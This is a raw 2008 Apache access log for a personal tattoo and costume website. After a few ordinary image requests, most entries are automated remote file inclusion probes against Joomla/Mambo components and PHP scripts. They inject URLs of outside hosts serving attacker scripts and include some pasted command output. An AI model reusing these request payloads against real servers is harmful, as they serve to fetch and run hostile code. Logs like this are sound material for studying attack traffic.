210.227.112.54 - - [01/Aug/2008:22:55:16 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
210.227.112.54 - - [01/Aug/2008:22:55:17 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
210.227.112.54 - - [01/Aug/2008:22:55:17 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
210.227.112.54 - - [01/Aug/2008:22:55:19 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
210.227.112.54 - - [01/Aug/2008:22:55:19 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
210.227.112.54 - - [01/Aug/2008:22:55:19 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
210.227.112.54 - - [01/Aug/2008:22:55:20 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
210.227.112.54 - - [01/Aug/2008:22:55:20 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
210.227.112.54 - - [01/Aug/2008:22:55:20 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
210.227.112.54 - - [01/Aug/2008:22:55:20 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
210.227.112.54 - - [01/Aug/2008:22:55:20 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
210.227.112.54 - - [01/Aug/2008:22:55:20 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
210.227.112.54 - - [01/Aug/2008:22:55:20 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
210.227.112.54 - - [01/Aug/2008:22:55:20 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
195.225.105.223 - - [01/Aug/2008:22:56:15 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.0" 404 326 "-""libwww-perl/5.48"
195.225.105.223 - - [01/Aug/2008:22:56:16 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.0" 404 321 "-""libwww-perl/5.48"
212.116.150.212 - - [01/Aug/2008:22:58:55 -0500] "GET /logs/home.php?pagina=http://bakazeus.t35.com/cmdtotal.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.811"
212.116.150.212 - - [01/Aug/2008:22:58:56 -0500] "GET /home.php?pagina=http://bakazeus.t35.com/cmdtotal.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.811"
195.225.105.223 - - [01/Aug/2008:23:00:33 -0500] "GET /logs//com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.0" 404 324 "-""libwww-perl/5.48"
195.225.105.223 - - [01/Aug/2008:23:00:33 -0500] "GET //com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.0" 404 319 "-""libwww-perl/5.48"
84.21.71.133 - - [01/Aug/2008:23:02:34 -0500] "GET //?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
84.21.71.133 - - [01/Aug/2008:23:02:34 -0500] "GET /logs/access_log.1212278400//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
84.21.71.133 - - [01/Aug/2008:23:02:35 -0500] "GET /logs//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 93674 "-""libwww-perl/5.805"
207.44.152.61 - - [01/Aug/2008:23:04:24 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
207.44.152.61 - - [01/Aug/2008:23:04:24 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
195.225.105.223 - - [01/Aug/2008:23:06:56 -0500] "GET /logs//com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.0" 404 324 "-""libwww-perl/5.48"
195.225.105.223 - - [01/Aug/2008:23:06:56 -0500] "GET //com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.0" 404 319 "-""libwww-perl/5.48"
207.44.152.61 - - [01/Aug/2008:23:07:28 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
207.44.152.61 - - [01/Aug/2008:23:07:28 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
65.55.208.135 - - [01/Aug/2008:23:08:16 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.135 - - [01/Aug/2008:23:08:17 -0500] "GET /logs/access_log.1210118400 HTTP/1.1" 200 346893 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
195.225.105.223 - - [01/Aug/2008:23:09:00 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.0" 404 326 "-""libwww-perl/5.48"
195.225.105.223 - - [01/Aug/2008:23:09:01 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.0" 404 321 "-""libwww-perl/5.48"
62.50.65.51 - - [01/Aug/2008:23:09:27 -0500] "GET /logs//com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 324 "-""libwww-perl/5.53"
62.50.65.51 - - [01/Aug/2008:23:09:27 -0500] "GET //com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 319 "-""libwww-perl/5.53"
72.248.189.82 - - [01/Aug/2008:23:10:45 -0500] "GET /logs/access_log.1212278400//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
72.248.189.82 - - [01/Aug/2008:23:10:45 -0500] "GET //?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
72.248.189.82 - - [01/Aug/2008:23:10:45 -0500] "GET /logs/access_log.1210291200//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
195.93.201.102 - - [01/Aug/2008:23:11:10 -0500] "GET /logs/access_log.1214438400//modules/xfsection/modify.php?dir_module=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
195.93.201.102 - - [01/Aug/2008:23:11:11 -0500] "GET //modules/xfsection/modify.php?dir_module=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
195.93.201.102 - - [01/Aug/2008:23:11:11 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
195.93.201.102 - - [01/Aug/2008:23:13:48 -0500] "GET /logs/access_log.1212883200//modules/xfsection/modify.php?dir_module=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
84.21.71.133 - - [01/Aug/2008:23:14:40 -0500] "GET /logs/access_log.1210291200//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
195.225.105.223 - - [01/Aug/2008:23:15:25 -0500] "GET /logs/access_log.1212883200//com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.0" 404 346 "-""libwww-perl/5.48"
195.225.105.223 - - [01/Aug/2008:23:15:25 -0500] "GET //com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.0" 404 319 "-""libwww-perl/5.48"
195.225.105.223 - - [01/Aug/2008:23:15:26 -0500] "GET /logs//com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.0" 404 324 "-""libwww-perl/5.48"
62.50.65.51 - - [01/Aug/2008:23:16:08 -0500] "GET //com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 319 "-""libwww-perl/5.53"
125.24.86.179 - - [01/Aug/2008:23:17:23 -0500] "GET /logs//com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
125.24.86.179 - - [01/Aug/2008:23:17:24 -0500] "GET //com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
125.24.86.179 - - [01/Aug/2008:23:17:46 -0500] "GET /logs//com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
125.24.86.179 - - [01/Aug/2008:23:17:47 -0500] "GET //com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
125.24.86.179 - - [01/Aug/2008:23:18:51 -0500] "GET /logs//com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
125.24.86.179 - - [01/Aug/2008:23:18:52 -0500] "GET //com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
125.24.86.179 - - [01/Aug/2008:23:20:11 -0500] "GET //com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
62.50.65.51 - - [01/Aug/2008:23:23:31 -0500] "GET /logs/access_log.1214438400//com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 346 "-""libwww-perl/5.53"
62.50.65.51 - - [01/Aug/2008:23:23:31 -0500] "GET //com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 319 "-""libwww-perl/5.53"
62.50.65.51 - - [01/Aug/2008:23:23:32 -0500] "GET /logs//com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 324 "-""libwww-perl/5.53"
89.186.169.135 - - [01/Aug/2008:23:23:52 -0500] "GET /logs//modules/admin/vw_usr_roles.php?baseDir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.186.169.135 - - [01/Aug/2008:23:23:52 -0500] "GET //modules/admin/vw_usr_roles.php?baseDir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
82.165.253.72 - - [01/Aug/2008:23:24:21 -0500] "GET /logs/access_log.1213315200//tools/send_reminders.php?noSet=0&includedir=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
82.165.253.72 - - [01/Aug/2008:23:24:21 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
82.165.253.72 - - [01/Aug/2008:23:24:21 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
62.50.65.51 - - [01/Aug/2008:23:25:43 -0500] "GET /logs/access_log.1212883200//com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 346 "-""libwww-perl/5.53"
89.186.169.135 - - [01/Aug/2008:23:26:59 -0500] "GET /logs/faqsupport/include.php?path[docroot]=http://h-pro.ru/lang/inc? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
89.186.169.135 - - [01/Aug/2008:23:26:59 -0500] "GET /faqsupport/include.php?path[docroot]=http://h-pro.ru/lang/inc? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
195.225.105.223 - - [01/Aug/2008:23:28:40 -0500] "GET /logs/access_log.1214438400//com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.0" 404 346 "-""libwww-perl/5.48"
195.225.105.223 - - [01/Aug/2008:23:28:40 -0500] "GET //com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.0" 404 319 "-""libwww-perl/5.48"
195.225.105.223 - - [01/Aug/2008:23:28:41 -0500] "GET /logs//com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.0" 404 324 "-""libwww-perl/5.48"
65.98.100.202 - - [01/Aug/2008:23:28:53 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.811"
65.98.100.202 - - [01/Aug/2008:23:28:53 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
65.98.100.202 - - [01/Aug/2008:23:28:53 -0500] "GET /logs/access_log.1212278400/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
65.98.100.202 - - [01/Aug/2008:23:28:59 -0500] "GET /logs/access_log.1213142400/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
80.74.146.175 - - [01/Aug/2008:23:29:18 -0500] "GET /inc/functions.inc.php?config[ppa_root_path]=http://www.babaclip.com/plugins/safehtml/filess/oye.txt%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
80.74.146.175 - - [01/Aug/2008:23:29:18 -0500] "GET /logs/inc/functions.inc.php?config[ppa_root_path]=http://www.babaclip.com/plugins/safehtml/filess/oye.txt%0D?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
80.74.146.175 - - [01/Aug/2008:23:29:24 -0500] "GET /logs/inc/functions.inc.php?config[ppa_root_path]=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
80.74.146.175 - - [01/Aug/2008:23:29:24 -0500] "GET /inc/functions.inc.php?config[ppa_root_path]=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
210.240.31.1 - - [01/Aug/2008:23:30:02 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
210.240.31.1 - - [01/Aug/2008:23:30:02 -0500] "GET /logs/access_log.1212278400/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
210.240.31.1 - - [01/Aug/2008:23:30:02 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
69.93.189.130 - - [01/Aug/2008:23:30:04 -0500] "GET /inc/functions.inc.php?config[ppa_root_path]=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
69.93.189.130 - - [01/Aug/2008:23:30:04 -0500] "GET /logs/inc/functions.inc.php?config[ppa_root_path]=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
210.240.31.1 - - [01/Aug/2008:23:30:10 -0500] "GET /logs/access_log.1213142400/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
200.146.61.130 - - [01/Aug/2008:23:30:37 -0500] "GET /logs/access_log.1212278400/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
200.146.61.130 - - [01/Aug/2008:23:30:49 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
200.146.61.130 - - [01/Aug/2008:23:30:49 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
200.146.61.130 - - [01/Aug/2008:23:30:49 -0500] "GET /logs/access_log.1213142400/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
200.131.208.21 - - [01/Aug/2008:23:30:54 -0500] "GET /logs/access_log.1212278400/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
200.131.208.21 - - [01/Aug/2008:23:30:54 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
200.131.208.21 - - [01/Aug/2008:23:30:54 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
200.131.208.21 - - [01/Aug/2008:23:31:08 -0500] "GET /logs/access_log.1213142400/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
65.98.100.202 - - [01/Aug/2008:23:32:04 -0500] "GET /logs/access_log.1212796800/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
65.98.100.202 - - [01/Aug/2008:23:32:04 -0500] "GET /logs/access_log.1212624000/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
200.131.208.21 - - [01/Aug/2008:23:32:13 -0500] "GET /logs/access_log.1212796800/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
200.131.208.21 - - [01/Aug/2008:23:32:20 -0500] "GET /logs/access_log.1212624000/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
200.131.208.21 - - [01/Aug/2008:23:32:30 -0500] "GET /logs/access_log.1212969600/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
87.106.191.163 - - [01/Aug/2008:23:32:55 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.191.163 - - [01/Aug/2008:23:32:55 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
200.146.61.130 - - [01/Aug/2008:23:33:33 -0500] "GET /logs/access_log.1212796800/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
200.146.61.130 - - [01/Aug/2008:23:33:33 -0500] "GET /logs/access_log.1212624000/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
200.146.61.130 - - [01/Aug/2008:23:33:38 -0500] "GET /logs/access_log.1212969600/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
195.225.105.223 - - [01/Aug/2008:23:34:06 -0500] "GET /logs/access_log.1212883200//com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.0" 404 346 "-""libwww-perl/5.48"
58.65.228.5 - - [01/Aug/2008:23:34:11 -0500] "GET /?mosConfig_absolute_path=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
210.240.31.1 - - [01/Aug/2008:23:34:15 -0500] "GET /logs/access_log.1212796800/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
58.65.228.5 - - [01/Aug/2008:23:34:22 -0500] "GET /logs/?mosConfig_absolute_path=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 200 44885 "-""libwww-perl/5.79"
210.240.31.1 - - [01/Aug/2008:23:34:25 -0500] "GET /logs/access_log.1212624000/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
210.240.31.1 - - [01/Aug/2008:23:34:31 -0500] "GET /logs/access_log.1212969600/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
207.200.116.202 - - [01/Aug/2008:23:35:04 -0500] "HEAD /costume/index1.htm HTTP/1.1" 200 0 "-""-"
125.24.86.179 - - [01/Aug/2008:23:36:13 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
125.24.86.179 - - [01/Aug/2008:23:36:14 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
125.24.86.179 - - [01/Aug/2008:23:36:14 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
125.24.86.179 - - [01/Aug/2008:23:36:14 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
207.200.116.202 - - [01/Aug/2008:23:36:35 -0500] "HEAD /costume/index1.htm HTTP/1.1" 200 0 "-""-"
207.200.116.202 - - [01/Aug/2008:23:37:10 -0500] "HEAD /costume/index1.htm HTTP/1.1" 200 0 "-""-"
207.200.116.202 - - [01/Aug/2008:23:37:14 -0500] "HEAD /costume/index1.htm HTTP/1.1" 200 0 "-""-"
87.106.191.163 - - [01/Aug/2008:23:37:38 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
87.106.191.163 - - [01/Aug/2008:23:37:38 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
207.200.116.202 - - [01/Aug/2008:23:38:10 -0500] "HEAD /costume/index1.htm HTTP/1.1" 200 0 "-""-"
